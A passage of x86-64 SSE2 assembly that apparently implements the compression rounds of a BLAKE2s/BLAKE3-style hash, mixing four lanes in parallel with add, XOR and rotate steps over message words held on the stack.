paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
